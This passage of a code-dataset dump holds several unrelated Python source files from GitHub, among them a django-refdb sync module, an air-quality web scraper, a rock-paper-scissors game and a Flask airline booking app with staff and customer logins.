the respective question. The code doesn't change the\nreferences in the RefDB database themselves but it creates needed extended\nnotes (all with the ``\"django-refdb-\"`` prefix in their citation keys).\nAdditionally, it creates RefDB user accounts for all Django user accounts.\n\"\"\"\n\nfrom __future__ import absolute_import\n\nimport pyrefdb\nimport django.contrib.auth.models\nfrom django.db.models import signals\nfrom . import refdb\nfrom . import models as refdb_app\nfrom . import SharedXNote\n\n\ndef add_extended_note_if_nonexistent(citation_key, database):\n u\"\"\"Adds an extended note with the given citation key if it doesn't exist\n yet. The note will be public (“shared”), but otherwise empty, i.e. 
no\n    title, content etc.\n\n    :Parameters:\n      - `citation_key`: the citation key of the extended note\n      - `database`: the name of the RefDB database\n\n    :type citation_key: str\n    :type database: unicode\n    \"\"\"\n    connection = refdb.get_connection(\"root\", database)\n    if not connection.get_extended_notes(\":NCK:=\" + citation_key):\n        connection.add_extended_notes(SharedXNote(citation_key))\n\n\ndef ask_user(question, interactive):\n    u\"\"\"Asks the user a question and returns whether the user has replied with\n    “yes” to it. If ``manage.py`` is not in interactive mode, this function\n    always returns ``False``.\n\n    :Parameters:\n      - `question`: the question to be asked; it should end in a question mark\n      - `interactive`: whether the user has requested interactive mode; it is\n        the same parameter as the `sync_extended_notes` parameter of the same\n        name\n\n    :type question: str\n    :type interactive: bool\n\n    :Return:\n      whether the user has replied with “yes” to the question\n\n    :rtype: bool\n    \"\"\"\n    if interactive:\n        confirm = raw_input(\"\\n\" + question + \" (yes/no): \")\n        while confirm not in [\"yes\", \"no\"]:\n            confirm = raw_input('Please enter either \"yes\" or \"no\": ')\n        return confirm == \"yes\"\n    else:\n        return False\n\n\ndef sync_extended_notes(sender, created_models, interactive, **kwargs):\n    u\"\"\"Synchronises the RefDB database with the Django database. See the\n    description of this module for further information.\n\n    :Parameters:\n      - `sender`: the sender of the signal; will always be the module\n        ``refdb.models``\n      - `created_models`: the model classes from any app which syncdb has\n        created so far\n      - `interactive`: whether interactive questions are allowed on the command\n        line\n\n    :type sender: module\n    :type created_models: list of ``django.db.models.Model``\n    :type interactive: bool\n    \"\"\"\n    databases = refdb.get_connection(\"root\", None).list_databases()\n    if ask_user(\"Do you want to reset user-specific extended notes \"\n                \"of a previous Django-RefDB in some or all RefDB databases?\", interactive):\n        for database in databases:\n            if ask_user(\"Do you want to reset user-specific extended notes \"\n                        \"of the RefDB database \\\"%s\\\"?\" % database, interactive):\n                connection = refdb.get_connection(\"root\", database)\n                ids = [note.id for note in connection.get_extended_notes(\n                    \":NCK:~^django-refdb-users-with-offprint OR :NCK:~^django-refdb-personal-pdfs OR \"\n                    \":NCK:~^django-refdb-creator\")]\n                connection.delete_extended_notes(ids)\n    for database in databases:\n        for relevance in range(1, 5):\n            add_extended_note_if_nonexistent(\"django-refdb-relevance-%d\" % relevance, database)\n        add_extended_note_if_nonexistent(\"django-refdb-global-pdfs\", database)\n        add_extended_note_if_nonexistent(\"django-refdb-institute-publication\", database)\n\nsignals.post_syncdb.connect(sync_extended_notes, sender=refdb_app)\n","repo_name":"figpope/SparrowSite","sub_path":"django-refdb/refdb/management.py","file_name":"management.py","file_ext":"py","file_size_in_byte":3996,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"3322606429","text":"import random\r\ncount = 0\r\nfor number in range(10):\r\n\r\n    player=int(input(\"\"\" we are playing rock-paper-scissors, choose: 1. rock 2. scissors 3. paper \"\"\")) \r\n    if player== 1:\r\n        print(\"you chose rock\") \r\n    elif player == 2:\r\n        print(\"you chose scissors\") \r\n    elif player == 3:\r\n        print(\"you chose paper\") \r\n    else:\r\n        print(\"I did not understand you \")\r\n\r\n    comp = 
random.randint(1,3)\r\n\r\n    if comp== 1:\r\n        print(\"the computer chose rock\") \r\n    elif comp == 2:\r\n        print(\"the computer chose scissors\") \r\n    else:\r\n        print(\"the computer chose paper\")\r\n\r\n    if player == comp:\r\n        print(\"draw\")\r\n    elif player== 1 and comp== 2 or comp== 3 and player== 2 or player== 3 and comp== 1: \r\n        print(\"you won\")\r\n        count +=1\r\n    elif player== 2 and comp== 1 or comp== 2 and player== 3 or player== 1 and comp== 3 : \r\n        print(\"you lost\") \r\n    else:\r\n        print(\"I did not understand you \")\r\n    if count == 3:\r\n        print(\"game over\")\r\n        break","repo_name":"Elijahbunn/Slava_5","sub_path":"DZ_Slavik_5.py","file_name":"DZ_Slavik_5.py","file_ext":"py","file_size_in_byte":1242,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"13066144376","text":"#! -*- coding:utf-8 -*-\n\n# Correlation with the weather on the same day: scrape the weather data\nimport datetime\nimport re\nimport time\nfrom requests.exceptions import RequestException\nimport pymysql\nimport requests\nfrom lxml import etree\nfrom selenium import webdriver\n\nmonth = [\"01\", \"02\", \"03\", \"04\", \"05\", \"06\", \"07\", \"08\", \"09\", \"10\", \"11\", \"12\"]\n\n\ndef get_one_page(url):\n\n\n\n    driver.get(url)\n    html = driver.page_source\n    return html\n\n\n\n\n# The parsed data contained duplicate entries!\ndef parse_oneDay(html):\n    oneDay_contents = []\n\n\n    selector = etree.HTML(html)\n\n    dtime = selector.xpath('//*[@id=\"content\"]/div[3]/table/tbody/tr/td[1]/text()')\n    AQI = selector.xpath('//*[@id=\"content\"]/div[3]/table/tbody/tr/td[3]/text()')\n    levels = selector.xpath('//*[@id=\"content\"]/div[3]/table/tbody/tr/td[2]/text()')\n    pm25 = selector.xpath('//*[@id=\"content\"]/div[3]/table/tbody/tr/td[5]/text()')\n    # Parsing is slow; the idea is to organise the data structure first and then clean everything in one pass\n\n\n    for i1,i2,i3,i4 in zip(dtime[1:],AQI[1:],levels[1:],pm25[1:]):\n        ha_list = []\n        ha_list.append([i1,i2,i3,i4])\n        for item in ha_list:\n            f4 = []\n            for it in item:\n                wt = ''.join(it.split())\n                f4.append(wt)\n            f4_tuple = tuple(f4)\n            oneDay_contents.append(f4_tuple)\n\n\n    return oneDay_contents\n\n\n\n\n\n\n\n\ndef insertDB(content):\n    connection = pymysql.connect(host='127.0.0.1', port=3306, user='root', password='123456', db='PM25',\n                                 charset='utf8mb4', cursorclass=pymysql.cursors.DictCursor)\n    cursor = connection.cursor()\n    # This checks the length of big_list, not the character length of content\n    try:\n        cursor.executemany('insert into YC_OneDay (dtime,AQI,levels,pm25) values (%s,%s,%s,%s)', content)\n        connection.commit()\n        connection.close()\n        print('Data inserted into MySQL successfully!')\n    except :\n        print('Insert failed')\n\n\n\n# The site is unstable as well, so build the monthly URLs by hand and crawl them\n# A bad network connection also affects the spider!\n\nif __name__ == '__main__':\n    options = webdriver.ChromeOptions()\n    options.add_argument(\"--no-sandbox\")\n    driver = webdriver.Chrome(\"/usr/bin/chromedriver\", chrome_options=options)\n    for year in [\"2014\", \"2015\", \"2016\", \"2017\", \"2018\", \"2019\"]:\n        for m in month:\n            full_date = year+ m\n            url = 'http://www.tianqihoubao.com/aqi/yinchuan-'+str(full_date)+'.html'\n\n\n            html = get_one_page(url)\n\n            contet = parse_oneDay(html)\n\n            insertDB(contet)\n            print(datetime.datetime.now())\n\n\n# dtime,AQI,levels,pm25\n# create table YC_OneDay(\n# id int not null primary key auto_increment,\n# dtime varchar(10),\n# AQI varchar(10),\n# levels varchar(10),\n# pm25 varchar(10)\n# ) engine=InnoDB charset=utf8;\n\n\n# drop table YC_OneDay;\n# modify the column type\n#alter table YC_OneDay modify column pm25 int ;\n\n\n# query the 30 records with the worst PM2.5\n\n# select dtime,AQI,levels,pm25 from YC_OneDay order by pm25 desc limit 
30;\n\n\n\n\n","repo_name":"mojoru2023/PM2.5_Spiders","sub_path":"yinchuan/YC_Pm25_OneDays.py","file_name":"YC_Pm25_OneDays.py","file_ext":"py","file_size_in_byte":3008,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"11337883941","text":"\nfrom setuptools import setup\n\nwith open(\"README.md\", \"r\") as fh:\n    long_description = fh.read()\n\nsetup(\n    name='helloworld',\n    version='0.0.1',\n    description='Say hello!',\n    py_modules=[\"helloworld\"],\n    package_dir={'': 'src'},\n    classifiers=[\n        \"Programming Language :: Python :: 3\",\n        \"Programming Language :: Python :: 3.6\",\n        \"Programming Language :: Python :: 3.7\",\n        \"License :: OSI Approved :: MIT License\",\n        \"Operating System :: OS Independent\",\n    ],\n    long_description=long_description,\n    long_description_content_type=\"text/markdown\",\n    install_requires = [\n        \n    ],\n    extras_require = {\n        \"dev\": [\n            \"pytest>=3.7\",\n            \"check-manifest\",\n        ],\n    },\n    entry_points = {\n        \"console_scripts\" :[\n            \"helloworld = helloworld:say_hello\",\n        ]\n    },\n    url=\"https://github.com/steve1281/helloworld_package\",\n    author=\"Steven V Falcigno\",\n    author_email=\"steve1281@hotmail.com\",\n)\n\n","repo_name":"steve1281/helloworld_package","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"23646081154","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nAuthor: Li Yuanming\nEmail: yuanmingleee@gmail.com\nDate: May 23, 2022\n\"\"\"\nfrom typing import Generic, TypeVar\n\nfrom pydantic import validator\nfrom pydantic.generics import GenericModel\n\nRequiredType = TypeVar('RequiredType')\n\n\nclass TypeCheckMixin(GenericModel, Generic[RequiredType]):\n    \"\"\"For auto-detecting the configuration class by the set value of :code:`type`.\n    \"\"\"\n    type: RequiredType\n\n    __required_type__: RequiredType\n\n    @validator('type')\n    def check_type(cls, required_type: RequiredType) -> RequiredType:\n        \"\"\"\n        Checks that the provided type value is the same as the required value.\n        This generates a validator to check the :code:`type` field of subclasses of the generic type :class:`RequiredType`.\n        \"\"\"\n        if required_type != cls.__required_type__:\n            raise ValueError(f'Expected {cls.__required_type__} but got {required_type}')\n        return required_type\n","repo_name":"MLSysOps/Active-Learning-as-a-Service","sub_path":"alaas/types/models/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","stars":206,"dataset":"github-code","pt":"72"}
{"seq_id":"24658903818","text":"def find(x):\n    pos = [z for z in data if z not in prev and sum([abs(x[i] - z[i]) for i in range(4)]) <= 3]\n    for y in pos:\n        prev.add(y)\n        find(y)\n\nwith open(\"2018day25.txt\", 'r') as file:\n    data = [tuple([int(y) for y in x.split(',')]) for x in file.read().splitlines()]\n    c = 0\n    prev = set()\n    while len(prev) != len(data):\n        x = next(iter([x for x in data if x not in prev]))\n        prev.add(x)\n        find(x)\n        c += 1\n    print(c)\n","repo_name":"Diderikdm/Advent-of-Code-2018","sub_path":"day 25 - part 1 & 2.py","file_name":"day 25 - part 1 & 2.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"33482235628","text":"from flask import Flask, render_template, request, session, url_for, redirect\nfrom flask_mysqldb import MySQL\nimport 
os\nimport sys\nimport math\nimport yaml # pip install pyyaml\nsys.path.insert(0, os.getcwd())\nfrom utils.general import *\nfrom utils.customer import *\nfrom utils.staff import *\nfrom utils.public_info import *\nfrom utils.register import *\nfrom utils.login import *\n\nglobal customer_tokens\nglobal staff_tokens\n\ncustomer_tokens = {}\nstaff_tokens = {}\n\napp = Flask(__name__)\napp.static_folder = 'static'\n\n# Configure db\ndb = yaml.safe_load(open('db_info.yaml'))\napp.config['MYSQL_USER'] = db['mysql_user']\napp.config['MYSQL_PASSWORD'] = db['mysql_password']\napp.config['MYSQL_DB'] = db['mysql_db']\napp.config['MYSQL_PORT'] = db['mysql_port']\n\nmysql = MySQL(app)\n\nwith app.app_context():\n curs = mysql.connection.cursor()\n\n\n# Define a route to hello function\n@app.route('/')\ndef hello():\n return render_template('index.html')\n\n\n\n### STAFF LOG IN ###\n\n@app.route(\"/staff\")\ndef staff():\n _, s_logged = store_verify(session, customer_tokens, staff_tokens)\n if s_logged:\n return render_template('staff.html', is_staff = True, username=session[\"username\"])\n return redirect(url_for(\"login_staff\"))\n\n@app.route('/login_staff')\ndef login_staff():\n _, s_logged = store_verify(session, customer_tokens, staff_tokens)\n\n if s_logged:\n return redirect(url_for(\"staff\"))\n\n return render_template('login_staff.html')\n\n@app.route('/loginAuthStaff', methods=['POST', 'GET'])\ndef loginAuthStaff():\n try:\n username = request.form['username']\n employer = request.form['employer']\n password = request.form['password']\n except:\n return redirect(url_for(\"login_staff\"))\n\n # Parse input for security\n if not parse_input([username]):\n return redirect(url_for(\"login_staff\"))\n\n if not parse_input([employer]):\n return redirect(url_for(\"login_staff\"))\n\n if not parse_input([password], True):\n return redirect(url_for(\"login_staff\"))\n\n is_staff = query_staff_credentials(username, password, employer, mysql)\n\n if is_staff:\n session['username'] = username\n session['key'] = encrypt_password(username + password)\n session['employer'] = employer\n staff_tokens[username] = session[\"key\"]\n return redirect(url_for(\"staff\"))\n\n error = 'Log in credentials are incorrect'\n return render_template('login_staff.html', error=error)\n\n\n\n### CUSTOMER LOG IN ###\n# Define route for login\n@app.route('/login_customer')\ndef login_customer():\n c_logged, _ = store_verify(session, customer_tokens, staff_tokens)\n\n if c_logged:\n return redirect(url_for(\"customer\"))\n\n return render_template('login_customer.html')\n\n@app.route(\"/customer\")\ndef customer():\n c_logged, _ = store_verify(session, customer_tokens, staff_tokens)\n if c_logged:\n return render_template('customer.html', is_customer=True, username=session[\"username\"])\n return redirect(url_for(\"login_customer\"))\n\n@app.route('/loginAuthCust', methods=['POST', 'GET'])\ndef loginAuthCust():\n try:\n email = request.form['username']\n password = request.form['password']\n except:\n return redirect(url_for(\"login_customer\"))\n\n # Parse input for security\n if not parse_input([email]):\n return redirect(url_for(\"login_customer\"))\n\n\n if not parse_input([password], True):\n return redirect(url_for(\"login_customer\"))\n\n is_customer = query_customer_credentials(email, password, mysql)\n if is_customer:\n session['username'] = email\n session['key'] = encrypt_password(email + password)\n customer_tokens[email] = session[\"key\"]\n return redirect(url_for(\"customer\"))\n\n error = 'Log in credentials 
are incorrect'\n    return render_template('login_customer.html', error=error)\n\n@app.route('/logout')\ndef logout():\n    session[\"username\"] = \"\"\n    session[\"key\"] = \"\"\n    session[\"employer\"] = \"\"\n    return redirect('/')\n\n@app.route('/homepage_redirect')\ndef homepage_redirect():\n    c_logged, s_logged = store_verify(session, customer_tokens, staff_tokens)\n    if s_logged:\n        return redirect(url_for('staff'))\n    if c_logged:\n        return redirect(url_for('customer'))\n    return redirect('/')\n\n### STAFF REGISTER ###\n\n# Define route for staff register\n@app.route('/register_staff')\ndef register_staff():\n    return render_template('register staff.html')\n\n# Authenticates the register\n@app.route('/registerAuthStaff', methods=['GET', 'POST'])\ndef registerAuthStaff():\n    username = \"\"\n    password = \"\"\n    fname = \"\"\n    lname = \"\"\n    dob = \"\"\n    employer = \"\"\n\n    # Check all input is there\n    try:\n        username = request.form['username']\n        password = request.form['password']\n        fname = request.form['fname']\n        lname = request.form['lname']\n        dob = request.form['dob']\n        employer = request.form['employer']\n\n    except:\n        error = \"Input Missing\"\n        return render_template('register staff.html', error=error)\n\n    # Parse input for security\n    if not parse_input([password], True):\n        error = \"Username or Password Error. Password may not contain space or '\\Z', '\\\\', '\\%', '\\_', \\\n    '?', '-', '(', ')', '{', '}', '[', ']', and must be 8 characters or more\"\n        return render_template('register staff.html', error=error)\n\n    if not parse_input([username, fname, lname, dob, employer]):\n        error = \"Input Error\"\n        return render_template('register staff.html', error=error)\n\n    if not check_date_format(dob):\n        error = 'Date of Birth must be format YYYY-MM-DD'\n        return render_template('register staff.html', error=error)\n\n    # check if username exists\n    if query_staff_username(username, mysql):\n        error = f'Account with username {username} already exists'\n        return render_template('register staff.html', error=error)\n\n    # check if employer does not exist\n    if not query_staff_employer(employer, mysql):\n        error = f'Airline {employer} does not exist'\n        return render_template('register staff.html', error=error)\n\n    # create account\n    create_staff_account(username, password, fname,\n                         lname, dob, employer, mysql)\n    # render homepage\n    return redirect('/')\n\n\n\n### CUSTOMER REGISTER ###\n\n# Define route for customer register\n@app.route('/register_customer')\ndef register_customer():\n    return render_template('register customer.html')\n\n# Authenticates the register\n@app.route('/registerAuthCustomer', methods=['GET', 'POST'])\ndef registerAuthCustomer():\n    email = \"\"\n    name = \"\"\n    password = \"\"\n    building_num = \"\"\n    city = \"\"\n    state = \"\"\n    street = \"\"\n    pp_country = \"\"\n    pp_num = \"\"\n    pp_expr = \"\"\n    dob = \"\"\n    phone_num = \"\"\n\n    # Make sure all input is there\n    try:\n        email = request.form['email']\n        name = request.form['name']\n        password = request.form['password']\n        building_num = request.form['building_num']\n        city = request.form['city']\n        state = request.form['state']\n        street = request.form['street']\n        pp_country = request.form['pp_country']\n        pp_num = request.form['pp_num']\n        pp_expr = request.form['pp_expr']\n        dob = request.form['dob']\n        phone_num = request.form['phone_num']\n    except:\n        error = \"Input Missing\"\n        return render_template('register customer.html', error=error)\n\n    # Parse input for security\n    if not parse_input([password], True):\n        error = \"Username or Password Error. 
Password may not contain space or '\Z', '\\', '\%', '\_', \\n    '?', '-', '(', ')', '{', '}', '[', ']', and must be 8 characters or more\"\n        return render_template('register customer.html', error=error)\n\n    if not parse_input([email, name, building_num, city, state, street, pp_country, pp_num, pp_expr, dob, phone_num]):\n        error = \"Input Error\"\n        return render_template('register customer.html', error=error)\n\n    if not check_date_format(dob):\n        error = 'Date of Birth must be format YYYY-MM-DD'\n        return render_template('register customer.html', error=error)\n\n    # check if email exists\n    if query_customer_email(email, mysql):\n        error = f'Account with email {email} already exists'\n        return render_template('register customer.html', error=error)\n\n    # create account\n    create_customer_account(email,name,password,building_num,city,state,\n                            street,pp_country,pp_num,pp_expr,dob,phone_num, mysql)\n\n    # render homepage\n    return redirect('/')\n\n\n\n### PUBLIC FLIGHT INFO ###\n@app.route('/public_info')\ndef public_info():\n    #headings,data=public_view_oneway_flights(mysql)\n    return render_template('public_info.html')\n\n@app.route(\"/public_view_flights\", methods=['GET', 'POST'])\ndef public_view_flight():\n    c_org = None\n    c_dest = None\n    a_org = None\n    a_dest = None\n    dept_dt = None\n    return_dt = None\n    f_type = None\n    headings = []\n    data = []\n\n    try:\n        f_type = request.form['flight_type']\n        c_org = request.form['city_origin']\n        c_dest = request.form['city_dest']\n        a_org = request.form['airport_origin']\n        a_dest = request.form['airport_dest']\n        dept_dt = request.form['dept_dt']\n        return_dt = request.form['return_dt']\n    except:\n        pass\n\n    if not parse_input([c_org,c_dest,a_org,a_dest,dept_dt,return_dt,f_type]):\n        return render_template('public_info.html', headings=headings, data=data)\n\n    if not (check_datetime_format(dept_dt) and check_datetime_format(return_dt)):\n        error = 'Datetime must be format YYYY-MM-DD HH:MM:SS'\n        return render_template('public_info.html', error=error)\n\n    if f_type=='two way':\n        headings, data = public_view_twoway_flights(mysql,CITY_ORIGIN=c_org,CITY_DEST=c_dest,AP_ORIGIN=a_org,\n                                                    AP_DEST=a_dest,START_DATE=dept_dt,END_DATE=return_dt)\n        return render_template('public_info.html', headings=headings, data=data)\n    elif f_type=='one way':\n        headings, data = public_view_oneway_flights(mysql,CITY_ORIGIN=c_org,CITY_DEST=c_dest,AP_ORIGIN=a_org,\n                                                    AP_DEST=a_dest,START_DATE=dept_dt,END_DATE=return_dt)\n        return render_template('public_info.html', headings=headings, data=data)\n    else:\n        error=\"Flight Type must be 'one way' or 'two way'\"\n        return render_template('public_info.html', error=error)\n\n@app.route('/public_status')\ndef public_status():\n    return render_template('public_status.html')\n\n@app.route(\"/public_check_status\", methods=['GET', 'POST'])\ndef public_check_status():\n    fnum = None\n    airline = None\n    dept_dt = None\n\n    try:\n        fnum=request.form['flight_num']\n        airline=request.form['airline']\n        dept_dt=request.form['dept_dt']\n    except:\n        error='Bad inputs'\n        return render_template('public_status.html', error=error)\n\n    if not parse_input([fnum,airline,dept_dt]):\n        error = 'Bad inputs'\n        return render_template('public_status.html', error=error)\n\n    if not check_datetime_format(dept_dt):\n        error = 'Datetime must be format YYYY-MM-DD HH:MM:SS'\n        return render_template('public_status.html', error=error)\n\n    headings, data = public_view_flight_status(mysql, fnum, airline, dept_dt)\n    return render_template('public_status.html', headings=headings, data=data)\n\n\n\n### STAFF USE 
CASES ###\n@app.route(\"/staff_view_flights\", methods=['GET', 'POST'])\ndef staff_view_flights():\n    _, s_logged = store_verify(session, customer_tokens, staff_tokens)\n    if s_logged:\n\n        # Before and after are None because they will be set to the wrong value in the sql function otherwise\n        before = None\n        after = None\n        source = \"\"\n        destination = \"\"\n        s_city = \"\"\n        d_city = \"\"\n        flights = []\n\n        try:\n            before = request.form['before']\n            after = request.form['after']\n            source = request.form['source']\n            destination = request.form['destination']\n            s_city = request.form['s_city']\n            d_city = request.form['d_city']\n\n        # Allow some inputs to be missing\n        except:\n            pass\n\n        # Input security\n        if not parse_input([before, after, source, destination, s_city, d_city]):\n            return render_template('staff_view_flights.html', flights=flights)\n\n        if not (check_datetime_format(before) and check_datetime_format(after)):\n            error = 'Datetime must be format YYYY-MM-DD HH:MM:SS'\n            return render_template('staff_view_flights.html', error=error)\n\n        airline = session['employer']\n        headings, flights = staff_view_flight_all(airline, before, after, source, destination, s_city, d_city, mysql)\n\n        return render_template('staff_view_flights.html', flights=flights, headings=headings)\n\n    return redirect('/')\n\n\n@app.route(\"/staff_view_flights_customer/<flight_number>/<airline>/<dept_dt>\")\ndef staff_view_flights_customer(flight_number, airline, dept_dt):\n    _, s_logged = store_verify(session, customer_tokens, staff_tokens)\n    if s_logged:\n        # dept_dt = \"\".join(dept_dt.split(\" \")[0].split(\"-\"))\n\n        headings, data = staff_view_flight_passengers(flight_number, airline, dept_dt, mysql)\n\n        if len(data) > 0:\n            result = True\n        else:\n            result = False\n\n        return render_template('staff_view_flights_customers.html', headings=headings, customers=data, flight_number=flight_number, result=result)\n\n    return redirect(url_for(\"login_staff\"))\n\n@app.route(\"/staff_create_flight\")\ndef staff_create_flight_view():\n    _, s_logged = store_verify(session, customer_tokens, staff_tokens)\n    if s_logged:\n\n        airline = session['employer']\n        planes = planes_of_airline(airline,mysql)\n\n        return render_template(\"staff_create_flight.html\", airline=airline, planes=planes)\n\n    return redirect(url_for(\"login_staff\"))\n\n@app.route('/staff_create_flight_submit', methods=[\"POST\", \"GET\"])\ndef staff_create_flight_submit():\n    _, s_logged = store_verify(session, customer_tokens, staff_tokens)\n    if s_logged:\n        flight_num = \"\"\n        dept_time = \"\"\n        arr_time = \"\"\n        source = \"\"\n        destination = \"\"\n        base_price = \"\"\n        airplane_id = \"\"\n        status = \"\"\n\n        airline = session['employer']\n\n        try:\n            flight_num = request.form['flight_num']\n            dept_time = request.form['dept_time']\n            arr_time = request.form['arr_time']\n            source = request.form['source']\n            destination = request.form['destination']\n            base_price = request.form['base_price']\n            airplane_id = request.form['airplane_id']\n            status = request.form['status']\n        except:\n            return redirect(url_for('staff_create_flight_view'))\n\n        if not parse_input([flight_num, dept_time, arr_time, source, destination, base_price, airplane_id, status]):\n            return redirect(url_for('staff_create_flight_view'))\n\n        if not (check_datetime_format(dept_time) and check_datetime_format(arr_time)):\n            return redirect(url_for('staff_create_flight_view'))\n\n        staff_create_flight(flight_num, airline, airplane_id, 
arr_time, dept_time, base_price, source, destination, status, mysql)\n\n        return render_template(\"success.html\", title='Airline Staff Add Flight', \\\n            message=f'Flight {flight_num} ({airplane_id}) departing at {dept_time} from {source} and arriving at {arr_time} in {destination} with price {base_price} and status {status}',\\\n            next='/staff')\n\n    return redirect(url_for(\"login_staff\"))\n\n@app.route('/staff_change_flight_status')\ndef staff_change_flights():\n    _, s_logged = store_verify(session, customer_tokens, staff_tokens)\n\n    if s_logged:\n        return render_template(\"staff_change_flight_status.html\")\n\n    return redirect(url_for(\"login_staff\"))\n\n@app.route('/staff_change_flight_status_submit', methods=['GET', 'POST'])\ndef staff_change_flights_submit():\n    _, s_logged = store_verify(session, customer_tokens, staff_tokens)\n    if s_logged:\n        flight_num = \"\"\n        dept_time = None\n        status = \"\"\n\n        airline = session[\"employer\"]\n\n        try:\n            flight_num = request.form['flight_num']\n            dept_time = request.form['dept_time']\n            status = request.form['status']\n\n        except:\n            return redirect(url_for(\"staff_change_flights\"))\n\n        if not parse_input([flight_num, dept_time, status]):\n            return redirect(url_for(\"staff_change_flights\"))\n\n        if not check_datetime_format(dept_time):\n            return redirect(url_for(\"staff_change_flights\"))\n\n        staff_update_flight_status(flight_num, airline, dept_time, status, mysql)\n\n        return render_template(\"success.html\", title='Airline Staff Change Flight', \\\n            message=f'Flight {flight_num} changed', next='/staff')\n\n    return redirect(url_for(\"login_staff\"))\n\n@app.route('/staff_add_new_airplane')\ndef staff_add_new_airplane():\n    _, s_logged = store_verify(session, customer_tokens, staff_tokens)\n    if s_logged:\n        return render_template(\"staff_add_new_airplane.html\")\n\n    return redirect(url_for(\"login_staff\"))\n\n@app.route('/staff_add_new_airplane_submit', methods=['GET', 'POST'])\ndef staff_add_new_airplane_submit():\n    _, s_logged = store_verify(session, customer_tokens, staff_tokens)\n    if s_logged:\n        airplane_id = \"\"\n        num_seats = \"\"\n        age = None\n        manufacturer = \"\"\n        airline = session['employer']\n\n        try:\n            airplane_id = request.form['airplane_id']\n            num_seats = request.form['num_seats']\n            age = request.form['age']\n            manufacturer = request.form['manufacturer']\n        except:\n            return redirect(url_for(\"staff_add_new_airplane\"))\n\n        if not parse_input([airplane_id, num_seats, age]):\n            return redirect(url_for(\"staff_add_new_airplane\"))\n\n        if not check_date_format(age):\n            return redirect(url_for(\"staff_add_new_airplane\"))\n\n        staff_create_airplane(airplane_id, airline, num_seats, age, manufacturer, mysql)\n\n        return render_template('success.html', title=\"Airline Staff Add Airplane\", \\\n            message=f\" Plane with ID: {airplane_id} has been added to {airline}\",\\\n            next='/staff')\n\n    return redirect(url_for(\"login_staff\"))\n\n@app.route('/staff_add_new_airport')\ndef staff_add_new_airport():\n    _, s_logged = store_verify(session, customer_tokens, staff_tokens)\n    if s_logged:\n        return render_template(\"staff_add_new_airport.html\")\n\n    return redirect(url_for(\"login_staff\"))\n\n@app.route('/staff_add_new_airport_submit', methods=['GET', 'POST'])\ndef staff_add_new_airport_submit():\n    _, s_logged = store_verify(session, customer_tokens, staff_tokens)\n    if s_logged:\n        name = \"\"\n        city = \"\"\n        country = \"\"\n        airport_type = \"\"\n\n        try:\n            name = request.form['name']\n            city = request.form['city']\n            country = request.form['country']\n            airport_type = 
request.form['airport_type']\n        except:\n            return redirect(url_for(\"staff_add_new_airport\"))\n\n        if not parse_input([name, city, country, airport_type]):\n            return redirect(url_for(\"staff_add_new_airport\"))\n\n        staff_create_airport(name, city, country, airport_type, mysql)\n\n        return render_template('success.html', title=\"Airline Staff Add Airport\",\\\n            message=f\"{airport_type} Airport {name} in {city}, {country} Added\",\\\n            next=\"/staff\")\n\n\n    return redirect(url_for(\"login_staff\"))\n\n@app.route('/staff_view_flight_ratings', methods=['GET', 'POST'])\ndef staff_view_flight_ratings():\n    _, s_logged = store_verify(session, customer_tokens, staff_tokens)\n    if s_logged:\n        flight_num = \"\"\n        dept_time = \"\"\n        airline = session['employer']\n\n        try:\n            flight_num = request.form['flight_num']\n            dept_time = request.form['dept_time']\n        except:\n            #Allow empty fields through\n            pass\n\n        if not parse_input([flight_num, dept_time]):\n            return redirect(url_for('staff'))\n\n        headings, ratings = staff_view_avg_rating(flight_num, airline, dept_time, mysql)\n\n        return render_template(\"staff_view_flight_ratings.html\", headings=headings, ratings=ratings, airline=airline)\n\n    return redirect(url_for(\"login_staff\"))\n\n@app.route('/staff_view_ratings_and_comments/<flight_num>/<dept_time>')\ndef staff_view_ratings_and_comments_view(flight_num, dept_time):\n    _, s_logged = store_verify(session, customer_tokens, staff_tokens)\n    if s_logged:\n        airline = session['employer']\n\n        headings, reviews = staff_view_ratings_and_comments(flight_num, airline, dept_time, mysql)\n        return render_template('staff_view_ratings_and_comments.html', headings=headings, reviews=reviews, flight_num=flight_num)\n\n    return redirect(url_for(\"login_staff\"))\n\n@app.route('/staff_view_frequent_customer', methods=['GET', 'POST'])\ndef staff_view_frequent_customer():\n    _, s_logged = store_verify(session, customer_tokens, staff_tokens)\n    if s_logged:\n        _, mfc = staff_view_mfc_pastyear(mysql)\n        mfc = mfc[0]\n        airline = session['employer']\n\n        email = \"\"\n\n        try:\n            email = request.form['email']\n        except:\n            return render_template('staff_view_frequent_customer.html', mfc=mfc, airline=airline)\n\n        headings, customer_info = staff_view_customer_flight_history(email, airline, mysql)\n\n\n        return render_template(\"staff_view_frequent_customer.html\", mfc=mfc, headings=headings, customer_info=customer_info, airline=airline)\n\n    return redirect(url_for(\"login_staff\"))\n\n\n@app.route('/staff_view_report_form')\ndef staff_view_tickets_sold():\n    _, s_logged = store_verify(session, customer_tokens, staff_tokens)\n    if s_logged:\n        return render_template('staff_view_report_form.html')\n\n    return redirect(url_for(\"login_staff\"))\n\n@app.route('/staff_view_report_view', methods=['GET', 'POST'])\ndef staff_view_tickets_sold_view():\n    _, s_logged = store_verify(session, customer_tokens, staff_tokens)\n    if s_logged:\n        s_date = \"\"\n        e_date = \"\"\n        airline = session['employer']\n\n        try:\n            s_date = request.form['s_date']\n            e_date = request.form['e_date']\n        except:\n            return redirect(url_for('staff_view_tickets_sold'))\n\n        if not parse_input([s_date, e_date]):\n            return redirect(url_for('staff_view_tickets_sold'))\n\n        _, t_sold = staff_view_tickets_sold_range(s_date, e_date, airline, mysql)\n        t_sold = t_sold[0][0]\n\n        return render_template('staff_view_report.html', t_sold=t_sold, s_date=s_date.split(\" \")[0],\n                               e_date=e_date.split(\" \")[0])\n\n    return 